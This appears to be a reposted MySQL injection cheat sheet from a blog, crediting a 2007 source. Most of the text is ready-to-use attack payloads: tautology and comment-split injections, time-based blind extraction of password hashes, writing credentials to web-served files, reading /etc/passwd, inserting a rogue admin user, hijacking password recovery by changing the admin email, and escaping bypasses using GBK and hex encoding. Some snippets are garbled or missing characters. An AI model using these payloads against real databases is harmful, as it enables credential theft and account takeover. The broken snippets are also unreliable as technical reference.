MySQL Injection Cheat Sheet

MySQL Injection Cheat Sheet

1. Basics.

[code lang-sql]SELECT FROM login / foobar /
SELECT
FROM login WHERE id = 1 or 1=1
SELECT FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
[/code]

2. Variations.
[code lang-sql]SELECT
FROM login WHE//RE id = 1 o//r 1=1
SELECT FROM login WHE//RE id = 1 o//r 1=1 A//ND user L//IKE "%root%"
[/code]

3. SHOW TABLES
[code lang-sql]SELECT
FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT
FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
[/code]

4. Blind injection vectors.
4-1) Operators
[code lang-sql]SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
[/code]
4-2) Evaluate
[code lang-sql]all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
[/code]
4-3) Math
[code lang-sql]SELECT FLOOR(7 + (RAND() 5));
SELECT ROUND(23.298, -1);
[/code]
4-4) Misc
[code lang-sql]SELECT LENGTH(COMPRESS(REPEAT(‘a’,1000)));
SELECT MD5(‘abc’);
[/code]
4-5) Benchmark
[code lang-sql]SELECT BENCHMARK(10000000,ENCODE(‘abc’,’123′));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost
[/code]
4-6) Using the timeout to check if user exists
[code lang-sql]SELECT IF( user = ‘root’, BENCHMARK(1000000,MD5( ‘x’ )),NULL) FROM login
Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
[/code]

5. Gathering info
5-1) Table mapping
[code lang-sql]SELECT COUNT(
) FROM tablename
[/code]
5-2) Field mapping
[code lang-sql]SELECT FROM tablename WHERE user LIKE "%root%"
SELECT
FROM tablename WHERE user LIKE "%"
SELECT FROM tablename WHERE user = ‘root’ AND id IS NOT NULL;
SELECT
FROM tablename WHERE user = ‘x’ AND id IS NULL;
[/code]
5-3) User mapping
[code lang-sql]SELECT FROM tablename WHERE email = ‘user@site.com’;
SELECT
FROM tablename WHERE user LIKE "%root%"
SELECT FROM tablename WHERE user = ‘username’
[/code]

6. Advanced SQL vectors
6-1) Writing info into files
[code lang-sql]SELECT password FROM tablename WHERE username = ‘root’ INTO OUTFILE
‘/path/location/on/server/www/passes.txt’
[/code]
6-2) Writing info into files without single quotes: (example)
[code lang-sql]SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct pathname!
[/code]
6-3) The CHAR() quoteless function
[code lang-sql]SELECT
FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)
[/code]
6-4) Extracting hashes
[code lang-sql]SELECT user FROM login WHERE user = ‘root’
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5(‘x’)),null) FROM login
[/code]
example:
[code lang-sql]SELECT user FROM login WHERE user = ‘admin’
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5(‘x’)),null) FROM login

SELECT user FROM login WHERE user = ‘admin’
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(‘x’)),null) FROM login
[/code]
6-5) explaining: (passwordfield,startcharacter,selectlength)
[code lang-sql]    is like: (password,1,2) this selects: ‘ab’
    is like: (password,1,3) this selects: ‘abc’
    is like: (password,1,4) this selects: ‘abcd’
[/code]
6-6) A quoteless example:
[code lang-sql]SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 ? ASCII 48 to 57 ~ a to z ? ASCII 97 to 122
[/code]

7. Misc
7-1) Insert a new user into DB
[code lang-sql]INSERT INTO login SET user = ‘r00t’, pass = ‘abc’
[/code]
7-2) Retrieve /etc/passwd file, put it into a field and insert a new user
[code lang-sql]load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
‘r00t’, pass = ‘abc’

Then login!
[/code]
7-3) Write the DB user away into tmp
[code lang-sql]SELECT host,user,password FROM user into outfile ‘/tmp/passwd’;
[/code]
7-4) Change admin e-mail, for “forgot login retrieval.”
[code lang-sql]UPDATE users set email = ‘mymail@site.com’ WHERE email = ‘admin@site.com’;
[/code]

8. Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

8-1) Bypassing addslashes() with GBK encoding

[code lang-sql]WHERE x = 0xbf27admin 0xbf27
[/code]
8-2) Bypassing mysql_real_escape_string() with BIG5 or GBK
[code lang-sql]"injection string"
に?する追加情報:

the above chars are Chinese Big5
[/code]

Advanced Vectors

1. Using an HEX encoded query to bypass escaping.

[code lang-sql]Normal:
SELECT FROM login WHERE user = ‘root’

Bypass:
SELECT
FROM login WHERE user = 0x726F6F74
[/code]

2. Inserting a new user in SQL.
[code lang-sql]Normal:
insert into login set user = ‘root’, pass = ‘root’

Bypass:
insert into login set user = 0x726F6F74, pass = 0x726F6F74
[/code]

3. How to determin the HEX value for injection.
[code lang-sql]SELECT HEX(‘root’);
gives you:

726F6F74
then add:

0x
before it.
[/code]

출처 : http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ (Malware 유포로 삭제 합니다.)

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다